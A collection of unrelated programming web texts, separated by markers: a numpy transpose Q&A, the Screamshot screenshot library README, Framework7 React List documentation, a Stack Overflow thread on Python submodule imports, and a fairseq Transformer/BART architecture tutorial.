self.z2_delta = self.z2_error*self.sigmoidPrime(self.z2)  # applying derivative of sigmoid to z2 error
self.W1 += X.T.dot(self.z2_delta)                         # adjusting first set (input --> hidden) weights
self.W2 += self.z2.T.dot(self.o_delta)                    # adjusting second set (hidden --> output) weights
What do those T's mean? self.W2.T, self.z2.T, etc...
.T transposes a matrix in numpy. See docs.scipy.org/doc/numpy-1.14.0/re...
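A tiny example of what .T does (the array values are made up for illustration):
import numpy as np

a = np.array([[1, 2, 3],
              [4, 5, 6]])  # shape (2, 3)
print(a.T)                 # shape (3, 2): rows and columns are swapped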
|
Python library to capture screenshots of web applications or pages
Project description
Screamshot
Python library to capture screenshots of web applications
Good practices
Any code addition must be done in your own branch. You can name it fl/what_this_branch_brings, where 'f' is the first letter of your first name and 'l' the first letter of your last name.
A branch resolves a specific issue.
Please write exhaustive tests. The coverage must not decrease.
Please merge the master branch into yours, run the tests and checks and correct all errors and warnings before pushing your code.
When you think you have finished you can make a pull request.
Testing and checks
To start the tests and checks
The first time
Install docker and docker-compose.
Run: docker-compose build, to create all the required images.
To start the verification, run: docker-compose up.
When it is already set up
You just need to run docker-compose up.
To clean up
If you want to stop containers and remove containers, networks, volumes, and images created by up command, run: docker-compose down.
If you want to delete all the images, run: docker rmi -f $(docker images -q).
To write new tests
You must use the unittest package
You must put your test file in the tests folder
You must name your test file using the following pattern: test_*.py
Local server
Usage
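The project documentation covers the details; as a rough sketch of standalone usage (assuming generate_bytes_img is an async function that takes a page URL, as the Django examples below suggest, and that the URL and output filename are just placeholders):
import asyncio
from screamshot import generate_bytes_img

async def main():
    # take a screenshot of a page and write the raw image bytes to disk
    img_bytes = await generate_bytes_img('https://www.google.fr')
    with open('screenshot.png', 'wb') as f:
        f.write(img_bytes)

asyncio.get_event_loop().run_until_complete(main())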
Documentation
The documentation is accessible here, on readthedocs.
Example with Django
The server must be launched using --nothreading and --noreload as arguments.
# views.py in a Django project
from django.http import HttpResponse
import asyncio
from screamshot import generate_bytes_img_prom
def home(request):
loop = asyncio.get_event_loop()
future = asyncio.Future()
asyncio.ensure_future(
generate_bytes_img_prom('https://www.google.fr', future))
loop.run_until_complete(future)
return HttpResponse(future.result(), content_type='image')
Or using the already wrapped function
# views.py in a Django project
from django.http import HttpResponse
from screamshot import generate_bytes_img__django_wrap
def home(request):
img = generate_bytes_img__django_wrap('https://www.google.fr')
return HttpResponse(img, content_type='image')
Using Gunicorn
With Gunicorn there are no thread-related problems, so we don't need to use the --nothreading and --noreload arguments.
CHANGELOG
0.0.1
Initialization of Screamshot library
init file:
author
version
all
core file:
A ScreenShot object with three methods:
load, loads a web page
screamshot, takes a screenshot of a loaded page
load_and_screamshot, loads a web page and takes a screenshot
A
0.1.0
There is no more ScreenShot object, just a function named generate_bytes_img which takes some parameters and returns a binary bytes object.
0.1.1
generate_bytes_img is no longer a sync function and generate_bytes_img_prom has been added
generate_bytes_img_prom uses the asyncio.Future object
0.1.2
A test and verification tool using Docker is now available
0.1.3
Add browser-manager script
Add screamshot script
0.1.4
Add serialize function
Add deserialize function
0.1.5
Add generate_bytes_img_django_wrap function
0.1.6
Module is now available
0.1.7
The browser endpoint is saved in the temporary directory
0.1.8
serialize function returns a dict object
deserialize takes a dict object
0.1.9
Remove serializer functions
Add a bytes_to_img function
0.1.10
generate_bytes_img_django_wrap is renamed generate_bytes_img_wrap
Errors are handled
0.1.11
bytes_to_png is renamed bytes_to_file
bytes_to_file supports type choice
0.1.12
You can now fetch http headers from another page with get_token
And store these headers in the local storage
|
List React Component
List views are versatile and powerful user interface components frequently found in iOS apps. A list view presents data in a scrollable list of multiple rows that may be divided into sections/groups.
List views have many purposes:
To let users navigate through hierarchically structured data
To present an indexed list of items
To display detail information and controls in visually distinct groupings
To present a selectable list of options
List React component represents Framework7's List View component.
List Components
The following components are included:
F7List / List - main List View element
F7ListGroup / ListGroup - list group element
List Properties
Prop Type Default Description
<List> properties
inset boolean false Makes list block inset
tabletInset boolean false Makes block inset on tablets, but not on phones
mediaList boolean false Enables Media List
linksList boolean false Enables simplified Links List
simpleList boolean false Enables simplified Simple List
sortable boolean false Enables Sortable List
sortableEnabled boolean false Enables sorting on sortable list
sortableMoveElements boolean When passed it will overwrite same `sortable.moveElements` global app parameter.
accordion boolean false Enables Accordion List
contactsList boolean false Enables Contacts List by adding required additional classes for styling
form boolean false Enables <form> tag on list block instead of <div>
formStoreData boolean false Enables form storage for the current form
inlineLabels boolean false Enables inline-styled labels for Form Inputs
noChevron boolean false Removes "chevron" icon on nested list item links
chevronCenter boolean false Sets "chevron" icon on nested media list items on center (vertically)
noHairlines boolean false Removes outer hairlines
noHairlinesMd boolean false Removes outer hairlines for MD theme
noHairlinesIos boolean false Removes outer hairlines for iOS theme
noHairlinesBetween boolean false Removes inner hairlines between items
noHairlinesBetweenMd boolean false Removes inner hairlines between items for MD theme
noHairlinesBetweenIos boolean false Removes inner hairlines between items for iOS theme
tab boolean false Adds additional "tab" class when block should be used as a Tab
tabActive boolean false Adds additional "tab-active" class when block used as a Tab and makes it active tab
virtualList boolean false Enables Virtual List
virtualListParams object Object with Virtual List Parameters
<ListGroup> properties
mediaList boolean false Enables Media List for this group
sortable boolean false Enables Sortable List for this group
simpleList boolean false Enables simplified Simple List for this group
List Events
Event Description
<List> events
tabShow Event will be triggered when List Block-Tab becomes visible/active
tabHide Event will be triggered when List Block-Tab becomes invisible/inactive
submit Event will be triggered on list-form submit when list used as form (with enabled form prop)
<List> Sortable specific events
sortableEnable Event will be triggered when sortable mode is enabled
sortableDisable Event will be triggered when sortable mode is disabled
sortableSort Event will be triggered after user release currently sorting element in new position. event.detail will contain object with from and to properties with start/new index numbers of sorted list item
<List> Virtual List specific events
virtualItemBeforeInsert Event will be triggered before item will be added to virtual document fragment
virtualItemsBeforeInsert Event will be triggered after current DOM list will be removed and before new document will be inserted
virtualItemsAfterInsert Event will be triggered after new document fragment with items inserted
virtualBeforeClear Event will be triggered before current DOM list will be removed and replaced with new document fragment
List Slots
List React component (<List>) has additional slots for custom elements:
before-list - element will be inserted in the beginning of list view and right before the <ul> main list
after-list - element will be inserted in the end of list view and right after the <ul> main list
list - element will be inserted inside of the <ul> main list element
Virtual List
For Virtual List usage and examples check the Virtual List React Component documentation.
Sortable List
For Sortable List usage and examples check the Sortable React Component documentation.
Accordion List
For Accordion List usage and examples check the Accordion React Component documentation.
Examples
Simple List
<BlockTitle>Simple List</BlockTitle>
<List simple-list>
<ListItem title="Item 1"></ListItem>
<ListItem title="Item 2"></ListItem>
<ListItem title="Item 3"></ListItem>
</List>
Simple List Links
<BlockTitle>Simple Links List</BlockTitle>
<List>
<ListItem title="Link 1" link="#"></ListItem>
<ListItem title="Link 2" link="#"></ListItem>
<ListItem title="Link 3" link="#"></ListItem>
</List>
Data list, with icons
<BlockTitle>Data list, with icons</BlockTitle>
<List>
<ListItem title="Ivan Petrov" after="CEO">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem title="John Doe" badge="5">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem title="Jenna Smith">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
</List>
Links
<BlockTitle>Links</BlockTitle>
<List>
<ListItem link="#" title="Ivan Petrov" after="CEO">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" title="John Doe" after="Cleaner">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" title="Jenna Smith">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
</List>
Links, Header, Footer
<BlockTitle>Links, Header, Footer</BlockTitle>
<List>
<ListItem link="#" header="Name" title="John Doe" after="Edit">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" header="Phone" title="+7 90 111-22-3344" after="Edit">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" header="Email" title="[email protected]" footer="Home" after="Edit">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" header="Email" title="[email protected]" footer="Work" after="Edit">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
</List>
Links, no icons
<BlockTitle>Links, no icons</BlockTitle>
<List>
<ListItem link="#" title="Ivan Petrov"></ListItem>
<ListItem link="#" title="John Doe"></ListItem>
<ListItem divider title="Divider Here"></ListItem>
<ListItem link="#" title="Ivan Petrov"></ListItem>
<ListItem link="#" title="Jenna Smith"></ListItem>
</List>
Grouped with sticky titles
<BlockTitle>Grouped with sticky titles</BlockTitle>
<List>
<ListGroup>
<ListItem title="A" groupTitle></ListItem>
<ListItem title="Aaron "></ListItem>
<ListItem title="Abbie"></ListItem>
<ListItem title="Adam"></ListItem>
</ListGroup>
<ListGroup>
<ListItem title="B" groupTitle></ListItem>
<ListItem title="Bailey"></ListItem>
<ListItem title="Barclay"></ListItem>
<ListItem title="Bartolo"></ListItem>
</ListGroup>
<ListGroup>
<ListItem title="C" groupTitle></ListItem>
<ListItem title="Caiden"></ListItem>
<ListItem title="Calvin"></ListItem>
<ListItem title="Candy"></ListItem>
</ListGroup>
</List>
Mixed and nested
<BlockTitle>Mixed and nested</BlockTitle>
<List>
<ListItem link="#" title="Ivan Petrov" after="CEO">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" title="Two icons here">
<Icon slot="media" icon="demo-list-icon"></Icon>
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem title="No icons here"></ListItem>
<li>
<ul>
<ListItem link="#" title="Ivan Petrov" after="CEO">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" title="Two icons here">
<Icon slot="media" icon="demo-list-icon"></Icon>
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem title="No icons here"></ListItem>
<ListItem link="#" title="Ultra long text goes here, no, it is really really long">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem title="With toggle">
<Icon slot="media" icon="demo-list-icon"></Icon>
<Toggle slot="after"></Toggle>
</ListItem>
</ul>
</li>
<ListItem link="#" title="Ultra long text goes here, no, it is really really long">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem title="With toggle">
<Icon slot="media" icon="demo-list-icon"></Icon>
<Toggle slot="after"></Toggle>
</ListItem>
</List>
Mixed, inset
<BlockTitle>Mixed, inset</BlockTitle>
<List>
<ListItem link="#" title="Ivan Petrov" after="CEO">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" title="Two icons here">
<Icon slot="media" icon="demo-list-icon"></Icon>
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" title="Ultra long text goes here, no, it is really really long">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem title="With toggle">
<Icon slot="media" icon="demo-list-icon"></Icon>
<Toggle slot="after"></Toggle>
</ListItem>
<BlockFooter>
<p>Here comes some useful information about list above</p>
</BlockFooter>
</List>
Tablet inset
<BlockTitle>Tablet inset</BlockTitle>
<List tabletInset>
<ListItem link="#" title="Ivan Petrov" after="CEO">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" title="Two icons here">
<Icon slot="media" icon="demo-list-icon"></Icon>
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" title="Ultra long text goes here, no, it is really really long">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<BlockFooter>
<p>This list block will look like "inset" only on tablets (iPad)</p>
</BlockFooter>
</List>
Media Lists
<BlockTitle>Media Lists</BlockTitle>
<Block>
<p>Media Lists are almost the same as Data Lists, but with a more flexible layout for visualization of more complex data, like products, services, users, etc.</p>
</Block>
<BlockTitle>Songs</BlockTitle>
<List mediaList>
<ListItem
link="#"
title="Yellow Submarine"
after="$15"
subtitle="Beatles"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
>
<img slot="media" src="https://cdn.framework7.io/placeholder/people-160x160-1.jpg" width="80" />
</ListItem>
<ListItem
link="#"
title="Don't Stop Me Now"
after="$22"
subtitle="Queen"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
>
<img slot="media" src="https://cdn.framework7.io/placeholder/people-160x160-2.jpg" width="80" />
</ListItem>
<ListItem
link="#"
title="Billie Jean"
after="$16"
subtitle="Michael Jackson"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
>
<img slot="media" src="https://cdn.framework7.io/placeholder/people-160x160-3.jpg" width="80" />
</ListItem>
</List>
Mail App
<BlockTitle>Mail App</BlockTitle>
<List mediaList>
<ListItem
link="#"
title="Facebook"
after="17:14"
subtitle="New messages from John Doe"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
></ListItem>
<ListItem
link="#"
title="John Doe (via Twitter)"
after="17:11"
subtitle="John Doe (@_johndoe) mentioned you on Twitter!"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
></ListItem>
<ListItem
link="#"
title="Facebook"
after="16:48"
subtitle="New messages from John Doe"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
></ListItem>
<ListItem
link="#"
title="John Doe (via Twitter)"
after="15:32"
subtitle="John Doe (@_johndoe) mentioned you on Twitter!"
text="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla sagittis tellus ut turpis condimentum, ut dignissim lacus tincidunt. Cras dolor metus, ultrices condimentum sodales sit amet, pharetra sodales eros. Phasellus vel felis tellus. Mauris rutrum ligula nec dapibus feugiat. In vel dui laoreet, commodo augue id, pulvinar lacus."
></ListItem>
</List>
Something more simple
<BlockTitle>Something more simple</BlockTitle>
<List mediaList>
<ListItem
title="Yellow Submarine"
subtitle="Beatles">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-1.jpg" width="44" />
</ListItem>
<ListItem
link="#"
title="Don't Stop Me Now"
subtitle="Queen">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-2.jpg" width="44" />
</ListItem>
<ListItem
title="Billie Jean"
subtitle="Michael Jackson">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-3.jpg" width="44" />
</ListItem>
</List>
Inset
<BlockTitle>Inset</BlockTitle>
<List mediaList inset>
<ListItem
link="#"
title="Yellow Submarine"
subtitle="Beatles">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-4.jpg" width="44" />
</ListItem>
<ListItem
link="#"
title="Don't Stop Me Now"
subtitle="Queen">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-5.jpg" width="44" />
</ListItem>
<ListItem
link="#"
title="Billie Jean"
subtitle="Michael Jackson">
<img slot="media" src="https://cdn.framework7.io/placeholder/fashion-88x88-6.jpg" width="44" />
</ListItem>
</List>
|
Python's import mechanism has always been a mystery to me. Sometimes importing a package grants access to the modules beneath it. For example,
import urllib
urllib.parse.unquote
gives
which shows that the functions are accessible even with only the package (i.e. urllib in this case) imported, without importing down to the module file. This is done inside a Jupyter notebook.
But when I do the same thing in the terminal:
>>> import urllib
>>> urllib.parse.unquote
Traceback (most recent call last):
  File "", line 1, in
AttributeError: module 'urllib' has no attribute 'parse'
Both Python versions are 3.6.1.
What makes the difference, and what is the good practice?
For an access to urllib.parse to work, the following two conditions must both hold:
The module object urllib must be bound to the name urllib, either in the local or global scope, or in some enclosing scope.
The submodule urllib.parse must have been initialized and bound to the parse attribute of the urllib module object.
An import urllib in the current local or global scope (or any enclosing scope) satisfies the first condition.
An import urllib.parse executed anywhere in the program satisfies the second condition, since it loads the submodule and binds it to the parse attribute of the urllib module object, and there is only one urllib module object for the whole program.
In the environments where urllib.parse was accessible after a simple import urllib, some other code must have loaded urllib.parse, which is why you could see it.
Test: "import IPython" └─IPython:┐ ┌────┘ ├──"from core.application import Application" │ └──IPython.core.application: "from IPython.core import release, crashhandler" │ └──IPython.core.crashhandler: "from IPython.core import ultratb" │ └──IPython.core.ultratb: "import pydoc" │ └──pydoc: "import urllib.parse" └──"from terminal.embed import embed" └──IPython.terminal.embed:┐ ┌───────────┘ ├──"from IPython.core import magic_arguments" │ └──IPython.core.magic_arguments: "from IPython.utils.text import dedent" │ └──IPython.utils.text: "from pathlib import Path" │ └──pathlib: "from urllib.parse import quote_from_bytes" ├──"from IPython.core.magic import Magics, magics_class, line_magic" │ └──IPython.core.magic: "from IPython.core import oinspect" │ └──IPython.core.oinspect: "from IPython.core import page" │ └──IPython.core.page: "from IPython.core.display import display" │ └──IPython.core.display: "import mimetypes" │ └──mimetypes: "import urllib.parse" └──"from IPython.terminal.interactiveshell import TerminalInteractiveShell" └──pygments.plugin: "import pkg_resources" └──pkg_resources: "import email.parser" └──email.parser: "from email.feedparser import FeedParser, BytesFeedParser" └──email.feedparser: "from email._policybase import compat32" └──email._policybase: "from email.utils import _has_surrogates" └──email.utils: "import urllib.parse"
The last line does indeed touch urllib.parse.
import scipy gives no access to scipy.stats.norm in either a terminal or a Jupyter notebook, because neither environment touches scipy.stats.
We can conclude from the above that it is not only good practice but in fact a requirement to import every level of the module you use.
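As an illustration of that conclusion, a minimal sketch (the URL-decoding call is just an example):
# Relying on some other library having imported the submodule is fragile:
import urllib
# urllib.parse.unquote("a%20b")   # may raise AttributeError in a fresh interpreter

# Importing every level explicitly always works:
import urllib.parse
print(urllib.parse.unquote("a%20b"))  # -> "a b"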
Thanks for all the answers!
As user2357112 said, something is importing it; I believe these are the specific modules and statements:
Test: "import IPython" └─IPython:┐ ┌────┘ ├──"from core.application import Application" │ └──IPython.core.application: "from IPython.core import release, crashhandler" │ └──IPython.core.crashhandler: "from IPython.core import ultratb" │ └──IPython.core.ultratb: "import pydoc" │ └──pydoc: "import urllib.parse" └──"from terminal.embed import embed" └──IPython.terminal.embed:┐ ┌───────────┘ ├──"from IPython.core import magic_arguments" │ └──IPython.core.magic_arguments: "from IPython.utils.text import dedent" │ └──IPython.utils.text: "from pathlib import Path" │ └──pathlib: "from urllib.parse import quote_from_bytes" ├──"from IPython.core.magic import Magics, magics_class, line_magic" │ └──IPython.core.magic: "from IPython.core import oinspect" │ └──IPython.core.oinspect: "from IPython.core import page" │ └──IPython.core.page: "from IPython.core.display import display" │ └──IPython.core.display: "import mimetypes" │ └──mimetypes: "import urllib.parse" └──"from IPython.terminal.interactiveshell import TerminalInteractiveShell" └──pygments.plugin: "import pkg_resources" └──pkg_resources: "import email.parser" └──email.parser: "from email.feedparser import FeedParser, BytesFeedParser" └──email.feedparser: "from email._policybase import compat32" └──email._policybase: "from email.utils import _has_surrogates" └──email.utils: "import urllib.parse"
Python 3 does not load the helper modules for urllib automatically. (https://docs.python.org/2/library/urllib.html)
"Note: the urllib module has been split into parts and renamed in Python 3 to urllib.request, urllib.parse, and urllib.error. The 2to3 tool will automatically adapt imports when converting your sources to Python 3."
"Note: urllib also exposes certain utility functions like splittype, splithost and others for parsing the URL into various components. But it is recommended to use urlparse for parsing URLs rather than using these functions directly. Python 3 does not expose these helper functions from the urllib.parse module."
If you inspect the urllib namespace with dir(urllib) right after the import, there are no submodules. After typing urllib.parse.unquote and getting the error, the urllib helper modules get loaded. (I'm serious, that sounds crazy and wrong and everything un-Pythonic, "he's a n00b", just try it.) You can then see them in the namespace via dir(urllib) and you can call them as if they had all been loaded initially. You will then get the function object back.
Python 3.5.2 (default, Aug 18 2017, 17:48:00) [GCC 5.4.0 20160609] on linux Type "help", "copyright", "credits" or "license" for more information.
>>> import urllib
>>> urllib.parse.unquote
Traceback (most recent call last):
  File "", line 1, in
AttributeError: module 'urllib' has no attribute 'parse'
>>> urllib.parse.unquote
In the six module, there is builtins.module (builtins.object)
Module_six_moves_urllib _LazyDescr(builtins.object) MovedAttribute MovedModule _LazyModule(builtins.module) Module_six_moves_urllib_error Module_six_moves_urllib_parse Module_six_moves_urllib_request Module_six_moves_urllib_response Module_six_moves_urllib_robotparser
There is additional documentation (of course), such as
class Module_six_moves_urllib(builtins.module): "| Create a six.moves.urllib namespace that resembles the Python 3 namespace"
I suspect the terminal does not invoke the builtin to load the helper modules automatically the way Jupyter does, although, honestly, I don't know.
Edit to add: importing urllib, importing six and invoking it [even help("six")] will load the parse, request, response, robotparser modules into the urllib namespace. Also, importing urllib and calling help on it will load parse but not the other modules into the namespace. It is possible that Jupyter is proactively calling help, which causes only the parse module to be loaded. I don't have IPython / conda / Jupyter installed, so I can't help test.
|
BART is a novel denoising autoencoder that achieved excellent results on summarization. It was proposed by FAIR, and a great implementation is included in its production-grade seq2seq framework: fairseq. In this tutorial I will walk through the building blocks of how a BART model is constructed.
Transformer Model
BART follows the recently successful Transformer model framework, but with some twists. So let's first look at how a Transformer model is constructed.
Overview
Fairseq adopts a highly object-oriented design. At the very top level there is a Transformer class that inherits from a FairseqEncoderDecoderModel, which in turn inherits from a BaseFairseqModel, which inherits from nn.Module. These are relatively light parent classes, and many methods in the base classes are overridden by child classes. We will focus on the Transformer class and the FairseqEncoderDecoderModel.
Besides, a Transformer model depends on a TransformerEncoder and a TransformerDecoder module. A TransformerEncoder requires a special TransformerEncoderLayer module. The TransformerEncoder module provides the feed-forward method that passes the data from input to encoder output, while each TransformerEncoderLayer builds a non-trivial and reusable part of the encoder layer - the layer including a MultiheadAttention module and LayerNorm. Similarly, a TransformerDecoder requires a TransformerDecoderLayer module. Notably, a TransformerDecoder inherits from a FairseqIncrementalDecoder class that defines incremental output production interfaces. Finally, the MultiheadAttention class inherits from FairseqIncrementalState, which allows the module to save outputs from previous time steps.
To sum up, I have provided a diagram of the dependency and inheritance of the aforementioned modules below. Note that dependency means the module holds one or more instances of the dependent module, denoted by a square arrow, and inheritance means the module holds all methods and attributes from the parent class, denoted by an angle arrow.
TransformerModel
A TransformerModel has the following methods; see the comments for an explanation of the use of each method:
@register_model("transformer") class TransformerModel(FairseqEncoderDecoderModel): # defines where to retrive pretrained model from torch hub @classmethod def hub_models(cls):... # pass in arguments from command line, initialize encoder and decoder def __init__(self, args, encoder, decoder):... # adds argument to command line entrance @classmethod def add_args(parser):... # compute encoding for input, construct encoder and decoder, returns a # Transformer instance @classmethod def bulid_model(cls, args, task):... # helper function to build an encoder @classmethod def build_encoder(cls, args, src_dict, embed_tokens):... # helper function to build a decoder @classmethod def build_decoder(cls, args, tgt_dict, embed_tokens):... # mostly the same with FairseqEncoderDecoderModel::forward, connects # encoder and decoder. def forward( self, src_tokens, src_lengths, prv_output_tokens, cls_input, return_all_hiddens, features_only, alingment_layer, alignement_heads ):...
This is the standard Fairseq style to build a new model. By using the decorator @register_model, the model name gets saved to MODEL_REGISTRY (see model/__init__.py), which is a global dictionary that maps the string of the class name to the class.
Another important side of the model is a named architecture. A model may be bound to different architectures, where each architecture may be suited for a specific variation of the model. Along with the Transformer model we have these architectures:
@register_model_architecture("transformer", "transformer") def base_architecture(args):... @register_model_architecture("transformer", "transformer_iwslt_de_en") def transformer_iwslt_de_en(args):... @register_model_architecture("transformer", "transformer_wmt_en_de") def transformer_wmt_en_de(args):... # parameters used in the "Attention Is All You Need" paper (Vaswani et al., 2017) @register_model_architecture("transformer", "transformer_vaswani_wmt_en_de_big") def transformer_vaswani_wmt_en_de_big(args):... ...
The architecture method mainly parses arguments or defines a set of default parameters used in the original paper. It uses a decorator function @register_model_architecture, which adds the architecture name to a global dictionary ARCH_MODEL_REGISTRY, which maps the architecture to the corresponding MODEL_REGISTRY entry. ARCH_MODEL_REGISTRY is then exposed to option.py::add_model_args, which adds the keys of the dictionary to the command line choices. I suggest following through the official tutorial to get more understanding about extending the Fairseq framework.
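As a rough sketch of what such an architecture function typically looks like (the architecture name here is made up for illustration; the getattr-default pattern is the common convention, not copied from the fairseq source):
@register_model_architecture("transformer", "transformer_tiny_example")  # hypothetical name
def transformer_tiny_example(args):
    # fill in defaults only when the user did not pass the flag on the command line
    args.encoder_embed_dim = getattr(args, "encoder_embed_dim", 256)
    args.encoder_layers = getattr(args, "encoder_layers", 3)
    args.decoder_layers = getattr(args, "decoder_layers", 3)
    base_architecture(args)  # fall back to the registered defaults for everything else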
The two most important components of the Transformer model are the TransformerEncoder and the TransformerDecoder.
TransformerEncoder
A TransformerEncoder inherits from FairseqEncoder. FairseqEncoder is an nn.Module. FairseqEncoder defines the following methods:
# FairseqEncoder.py
EncoderOut = NamedTuple(
    "EncoderOut",
    [
        ("encoder_out", Tensor),                     # T x B x C
        ("encoder_padding_mask", Tensor),            # B x T
        ("encoder_embedding", Tensor),               # B x T x C
        ("encoder_states", Optional[List[Tensor]]),  # List[T x B x C]
    ],
)

class FairseqEncoder(nn.Module):
    # initialize the class, saves the token dictionary
    def __init__(self, dictionary): ...

    # Required to be implemented
    def forward(self, src_tokens, src_lengths=None, **kwargs): ...

    # The output of the encoder can be reordered according to the
    # `new_order` vector. Required to be implemented
    def reorder_encoder_out(self, encoder_out, new_order): ...

    # An arbitrarily large positive number
    def max_positions(self): ...

    # For old Fairseq version compatibility
    def upgrade_state_dict(self, state_dict): ...
Besides, FairseqEncoder defines the format of an encoder output to be an EncoderOut type. EncoderOut is a NamedTuple. The items in the tuple are:
encoder_out: of shape Time x Batch x Channel, the output of the encoder.
encoder_padding_mask: of shape Batch x Time. It has the same length as each input, acting as the bitwise mask that shows which part of the sentence is padding.
encoder_embedding: of shape Batch x Time x Channel, the word embeddings before applying the positional encoding, layer norm and dropout.
encoder_states: of shape list[Time x Batch x Channel], intermediate outputs from the encoder; may be None if not needed.
The TransformerEncoder class is defined as follows:
class TransformerEncoder(FairseqEncoder):
    # initialize all layers and modules needed in forward,
    # including TransformerEncoderLayer, LayerNorm,
    # PositionalEmbedding etc.
    # embed_tokens is an `Embedding` instance, which
    # defines how to embed a token (word2vec, GloVe etc.)
    def __init__(self, args, dictionary, embed_tokens): ...

    # forward_embedding takes the raw tokens and passes them through the
    # embedding layer, positional embedding, layer norm and dropout
    def forward_embedding(self, src_tokens): ...

    # Forward pass of a transformer encoder. Chains
    # TransformerEncoderLayers. Returns EncoderOut type.
    def forward(
        self,
        src_tokens,
        src_lengths,
        cls_input: Optional[Tensor] = None,
        return_all_hiddens: bool = False,
    ): ...

    def reorder_encoder_out(self, encoder_out: EncoderOut, new_order): ...

    def max_positions(self): ...
In the forward pass, the encoder takes the input, passes it through forward_embedding, and then through several TransformerEncoderLayers; notice that LayerDrop [3] is used to randomly leave out some encoder layers.
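A minimal sketch of the LayerDrop idea (not the exact fairseq code; the probability value is illustrative): each layer is skipped with some probability during training, while all layers are applied at inference time.
import torch

def encode_with_layerdrop(x, layers, layerdrop_p=0.1, training=True):
    # randomly skip whole encoder layers during training (LayerDrop [3])
    for layer in layers:
        if training and torch.rand(1).item() < layerdrop_p:
            continue  # drop this layer for the current batch
        x = layer(x)
    return x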
TransformerEncoderLayer
A TransformerEncoderLayer is an nn.Module, which means it should implement a forward method. Refer to reading [2] for a nice visual understanding of what one of these layers looks like. The module is defined as:
class TransformerEncoderLayer(nn.Module):
    def __init__(self, args): ...

    def upgrade_state_dict_named(self, state_dict, name): ...

    def forward(self, x, encoder_padding_mask, attn_mask: Optional[Tensor] = None): ...
Notice the forward method, where encoder_padding_mask indicates the padding positions of the input, and attn_mask indicates that, when computing the output at a position, the layer should not consider the input at certain other positions; this is used in the MultiheadAttention module.
There is a subtle difference between the original Vaswani implementation and the tensor2tensor implementation. In the former implementation the LayerNorm is applied after the MHA module, while in the latter it is applied before. In this module, a switch normalized_before in args specifies which mode to use.
TransformerDecoder
A TransformerDecoder has a few differences from the encoder. First, it is a FairseqIncrementalDecoder, which in turn is a FairseqDecoder.
Compared to FairseqEncoder, FairseqDecoder requires implementing two more functions: output_layer(features) and get_normalized_probs(net_output, log_probs, sample), where the first method converts the features from the decoder to actual words and the second applies softmax functions to those features.
FairseqIncrementalDecoder is a special type of decoder. During inference, a seq2seq decoder takes in a single output from the previous time step and generates the output of the current time step. In order for the decoder to perform more interesting operations, it needs to cache long-term states from earlier time steps. These include all hidden states, convolutional states, etc. A FairseqIncrementalDecoder is defined as:
@with_incremental_state
class FairseqIncrementalDecoder(FairseqDecoder):
    def __init__(self, dictionary): ...

